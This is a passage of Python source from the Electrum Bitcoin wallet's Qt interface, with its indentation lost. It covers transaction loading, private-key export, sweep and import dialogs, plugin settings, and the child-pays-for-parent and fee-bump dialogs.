self.import_channel_backup(data[15:])
return
# else if the user scanned an offline signed tx
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = self.getOpenFileName(_("Select your transaction file"),
TRANSACTION_FILE_EXTENSION_FILTER_ANY)
if not fileName:
return
try:
with open(fileName, "rb") as f:
file_content = f.read() # type: Union[str, bytes]
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason),
title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except UntrustedServerReturnedError as e:
self.logger.info(f"Error getting transaction from network: {repr(e)}")
self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui())
return
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
else:
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
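# Export keys in a background thread so the dialog stays responsive; Qt signals feed progress and results back to the GUI.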
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
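# Written with 0o600 permissions: the file contains raw private keys.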
with open(fileName, "w+") as f:
os.chmod(fileName, 0o600)
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import)
def do_export_labels(self):
export_meta_gui(self, _('labels'), self.wallet.export_labels)
def import_invoices(self):
import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update)
def export_invoices(self):
export_meta_gui(self, _('invoices'), self.wallet.export_invoices)
def import_requests(self):
import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update)
def export_requests(self):
export_meta_gui(self, _('requests'), self.wallet.export_requests)
def import_contacts(self):
import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update)
def export_contacts(self):
export_meta_gui(self, _('contacts'), self.contacts.export_file)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
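# Enable the Sweep button only once both the destination address and the entered private keys are valid.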
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address_for_corruption(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
privkeys = get_pk()
def on_success(result):
coins, keypairs = result
outputs = [PartialTxOutput.from_address_and_value(addr, value='!')]
self.warn_if_watching_only()
self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs)
def on_failure(exc_info):
self.on_error(exc_info)
msg = _('Preparing sweep transaction...')
task = lambda: self.network.run_from_another_thread(
sweep_preparations(privkeys, self.network))
WaitingDialog(self, msg, task, on_success, on_failure)
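# Shared helper for importing addresses/private keys: prompts for input, runs func, and reports which entries were accepted or rejected.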
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
util.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.db.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.db.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
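# Add or remove a plugin's settings widget when the plugin is toggled.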
def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int):
widget = settings_widgets.get(name) # type: Optional[QWidget]
if widget and not p:
# plugin got disabled, rm widget
grid.removeWidget(widget)
widget.setParent(None)
settings_widgets.pop(name)
elif widget is None and p and p.requires_settings() and p.is_enabled():
# plugin got enabled, add widget
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# note: all enabled plugins will receive this hook:
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx: Transaction, new_tx: PartialTransaction) -> None:
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes' % total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
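# Recompute the output amount, combined fee and combined feerate whenever the child fee is edited.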
def on_fee_edit(x):
fee_for_child = fee_e.get_amount()
if fee_for_child is None:
return
out_amt = max_fee - fee_for_child
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_for_child
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
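# Derive the child's fee from a target feerate applied to the combined (parent + child) size, subtracting the fee already paid by the parent.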
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(fee_combo, 4, 2)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee is None:
return # fee left empty, treat is as "cancel"
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx: Transaction):
txid = tx.txid()
assert txid
fee = self.wallet.get_tx_fee(txid)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(txid)
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
grid = QGridLayout()
grid.addWidget(QLabel(_('Current Fee') + ':'), 0, 0)
grid.addWidget(QLabel(self.format_amount(fee) + ' ' + self.base_unit()), 0, 1)
grid.addWidget(QLabel(_('Current Fee rate') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_fee_rate(1000 * old_fee_rate)), 1, 1)
grid.addWidget(QLabel(_('New Fee rate') + ':'), 2, 0)
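# Typing a feerate manually deactivates the slider; moving the slider re-activates it and overwrites the field.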
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
grid.addWidget(feerate_e, 2, 1)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.deactivate()
grid.addWidget(fee_slider, 3, 1)
grid.addWidget(fee_combo, 3, 2)
vbox.addLayout(grid)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate, coins=self.get_coins())
except CannotBumpFee as e:
self.show_error(str(e))
return
if is_final:
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_desc=tx_label)
def save_transaction_into_wallet(self, tx: Transaction):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_db()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
def show_cert_mismatch_error(self):
if self.showing_cert_mismatch_error:
return
self.showing_cert_mismatch_error = True
self.show_critical(title=_("Certificate mismatch"),
msg=_("The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.") + "\n\n" +
_("Electrum will now exit."))
self.showing_cert_mismatch_error = False
self.close()